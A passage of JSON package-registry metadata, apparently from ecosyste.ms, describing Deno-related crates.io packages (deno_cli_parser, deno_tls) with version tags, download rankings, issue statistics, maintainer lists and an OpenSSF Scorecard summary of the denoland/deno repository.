5e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-30T20:52:20.339Z","dependent_packages_count":0,"downloads":1564,"downloads_period":"total","dependent_repos_count":0,"rankings":{"downloads":89.14524615379403,"dependent_repos_count":13.914778713989993,"dependent_packages_count":18.37979949925634,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":40.47994145568012},"purl":"pkg:cargo/deno_cli_parser","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_cli_parser","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_cli_parser","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_cli_parser/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-30T03:37:30.716Z","issues_count":6632,"pull_requests_count":9650,"avg_time_to_close_issue":17191240.372105263,"avg_time_to_close_pull_request":1531932.6714801444,"issues_closed_count":3798,"pull_requests_closed_count":8032,"pull_request_authors_count":582,"issue_authors_count":2478,"avg_comments_per_issue":2.5061821471652594,"avg_comments_per_pull_request":0.7196891191709844,"merged_pull_requests_count":7013,"bot_issues_count":0,"bot_pull_requests_count":48,"past_year_issues_count":671,"past_year_pull_requests_count":1201,"past_year_avg_time_to_close_issue":1405378.1057268723,"past_year_avg_time_to_close_pull_request":1322346.2602118002,"past_year_issues_closed_count":227,"past_year_pull_requests_closed_count":661,"past_year_pull_request_authors_count":185,"past_year_issue_authors_count":373,"past_year_avg_comments_per_issue":1.2354694485842026,"past_year_avg_comments_per_pull_request":1.11240632805995,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":13,"past_year_merged_pull_requests_count":488,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1799,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":674,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":290,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":284,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":21,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":395,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":186,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"crowlKats","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"dsherret","count":28,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"devsnek","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"ry","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_cli_parser/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_cli_parser/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_cli_parser/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_cli_parser/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_cli_parser/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_cli_parser/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2026-06-18T21:20:19.902Z","updated_at":"2026-06-18T21:20:19.902Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2026-06-18T21:20:20.054Z","updated_at":"2026-06-18T21:20:20.054Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":338199,"maintainers_count":71476,"namespaces_count":0,"keywords_count":71845,"github":"rust-lang","metadata":{"funded_packages_count":30558,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-04T05:05:22.166Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":4047489,"name":"deno_tls","ecosystem":"cargo","description":"TLS for Deno","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":245,"first_release_published_at":"2021-08-10T11:27:02.515Z","latest_release_published_at":"2026-08-27T15:19:49.886Z","latest_release_number":"0.245.0","last_synced_at":"2026-09-07T22:57:03.804Z","created_at":"2022-04-12T10:01:12.030Z","updated_at":"2026-09-07T22:57:03.806Z","registry_url":"https://crates.io/crates/deno_tls/","install_command":"cargo install deno_tls","documentation_url":"https://docs.rs/deno_tls/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-29T19:17:00.000Z","size":248743,"stargazers_count":108340,"open_issues_count":1540,"forks_count":6359,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-29T21:56:41.390Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-29T20:05:41.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous 